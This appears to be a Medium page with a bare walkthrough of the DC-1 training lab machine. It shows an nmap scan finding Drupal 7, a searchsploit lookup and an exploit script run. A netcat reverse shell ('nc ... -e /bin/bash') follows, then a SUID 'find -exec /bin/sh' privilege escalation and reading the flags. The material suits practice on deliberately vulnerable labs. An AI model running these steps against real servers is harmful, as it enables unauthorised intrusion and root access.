DC-1 (Walkthrough)

└──╼ #netdiscover -i vboxnet1
└──╼ #nmap -v -sT -A -p-
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7
(protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-favicon: Unknown favicon MD5:
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33917/udp6 status
| 100024 1 34849/udp status
| 100024 1 35201/tcp6 status
|_ 100024 1 44979/tcp status
44979/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:FA:DF:58 (Oracle VirtualBox virtual
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Uptime guess: 0.037 days (since Fri Feb 21 15:21:23 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
└──╼ #searchsploit drupal 7
└──╼ #python 34992.py -t -u guest -p guest
└──╼ #nc -nlvp 1234
nc -nv 1234 -e /bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ cat flag1.txt
find / -perm /4000 2>/dev/null
find . -exec '/bin/sh' \;
cat thefinalflag.txt




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

DKEY Airdrop Contest

How dangerous is the TV?

DApps: Crypto Basics For All Part 1

My First ever blog about a web application vulnerability.

Here’s Why Saving Passwords In Your Browser Is a Gigantic Mistake!

5 Types of Security Incidents You Should Know

HTB Retired Box Walkthrough: Beep

Using iOS Shortcut Automations to Automatically Turn Off Wi-Fi & Bluetooth Interfaces

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


More from Medium

The Software Initiative (Part 3)

Week 1. Introduction

An experiment on traffic light color detection using different color spaces

Access Delegation — OAuth 2.0 sample WSO2